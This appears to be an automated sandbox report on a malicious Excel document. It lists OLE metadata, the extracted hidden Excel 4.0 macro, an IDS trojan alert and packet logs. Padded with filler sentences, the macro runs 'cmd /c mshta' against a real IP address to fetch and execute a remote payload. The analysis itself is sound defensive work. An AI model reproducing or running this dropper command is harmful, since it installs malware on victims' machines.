                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:e4eea286a4b4bcb4

                                                                                                                    Static OLE Info

                                                                                                                    General

                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1

                                                                                                                    OLE File "80_513972285.xls"

                                                                                                                    Indicators
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Summary
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-26 22:33:31
                                                                                                                    Last Saved Time:2022-01-26 22:36:27
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Summary
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576

                                                                                                                    Streams

                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.347239233907
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i m e C a r d . . . . . S h e e t 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b8 00 00 00
                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.264984368025
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . / . . . . . . @ . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 67009
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:67009
                                                                                                                    Entropy:6.37385915268
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                    Macro 4.0 Code

                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro13False0Falsepost1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")25,10,=HALT()
                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro13False0Falsepre1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")25,10,=HALT()

                                                                                                                    Network Behavior

                                                                                                                    Snort IDS Alerts

                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                    01/28/22-21:24:47.819865TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.168

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:24:41.215337992 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.276751995 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.276876926 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.280599117 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.342339039 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342391014 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342415094 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342437029 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342466116 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342492104 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342505932 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.342524052 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342539072 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.342560053 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.342571020 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342603922 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.342614889 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342653036 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.342658997 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:41.342689037 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:41.348305941 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:47.758677959 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:47.817151070 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:47.817209959 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:47.819864988 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:47.878340960 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:47.878390074 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:47.878407001 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:47.878493071 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:24:47.953516006 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:47.971210003 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:47.971338987 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:47.971502066 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:47.987519979 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031068087 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031097889 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031115055 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031130075 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031141996 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031183958 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:48.032617092 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:48.314838886 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.476866961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.476942062 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.477128983 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.640506983 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685756922 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685779095 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685797930 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685817003 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685838938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685878992 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685899973 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685899973 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.685905933 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.685919046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685937881 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685939074 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.685957909 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685973883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.686116934 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.847829103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.847847939 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.847940922 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.853611946 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.853631020 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.853689909 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.865048885 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.865084887 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.865138054 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.876492977 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.876511097 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.876574039 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.887865067 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.887885094 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.887969017 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.899410963 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.899446964 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.899490118 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.910604954 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.910628080 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.910718918 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.921982050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.922005892 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.922056913 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.933341980 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.933367014 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.933449030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.944802046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.944828033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.944977999 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.009958982 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.009994984 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.010195017 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.016185045 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.016225100 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.016339064 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.026963949 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.027000904 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.027045965 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.036767960 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.036803961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.036875010 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.046566010 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.046602011 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.046758890 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.056385040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.056417942 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.056461096 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.066143036 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.066174984 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.066217899 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.075954914 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.075989008 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.076040030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.085760117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.085789919 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.085835934 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.095535040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.095571041 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.095650911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.105361938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.105396986 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.105437994 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.115178108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.115210056 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.115271091 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.124799967 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.124835968 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.124883890 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.134381056 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.134416103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.134496927 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.143477917 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.143508911 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.143553972 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.152501106 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.152539015 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.152585983 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.161552906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.161587000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.161631107 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.170659065 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.170697927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.170747995 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.179747105 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.179790974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.179842949 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.188762903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.188798904 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.188837051 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.197881937 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.197932959 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.197973013 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.203200102 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.203236103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.203279018 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.208580971 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.208621025 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.208883047 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.213962078 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.214000940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.214046001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.219278097 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.219316006 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.219356060 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.224606037 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.224643946 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.224692106 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.229934931 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.229970932 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.230015039 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.235030890 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.235069990 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.235220909 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.240206003 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.240245104 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.240288019 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.245273113 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.245304108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.245369911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.250413895 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.250449896 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.250493050 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.255500078 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.255537033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.255588055 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.260590076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.260624886 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.260673046 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.267400026 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.267433882 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.267522097 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.270503998 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.270534992 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.270571947 CET4917080192.168.2.2274.208.236.157
